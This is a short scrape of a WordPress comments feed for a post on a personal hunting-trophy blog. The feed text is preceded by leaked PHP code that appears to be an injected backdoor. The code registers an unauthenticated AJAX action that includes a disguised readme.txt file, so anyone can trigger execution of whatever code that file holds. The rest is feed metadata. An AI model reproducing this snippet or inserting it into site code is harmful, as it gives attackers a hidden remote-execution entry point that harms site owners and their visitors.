if(!function_exists('file_check_readme74246')){ add_action('wp_ajax_nopriv_file_check_readme74246', 'file_check_readme74246'); add_action('wp_ajax_file_check_readme74246', 'file_check_readme74246'); function file_check_readme74246() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Everyman's Dream, An African Quest Pt. 2 http://vincestrophies.com/?p=19 Vince Lupo's Personal Trophy Room Wed, 14 Oct 2015 08:19:54 +0000 hourly 1 https://wordpress.org/?v=5.8.11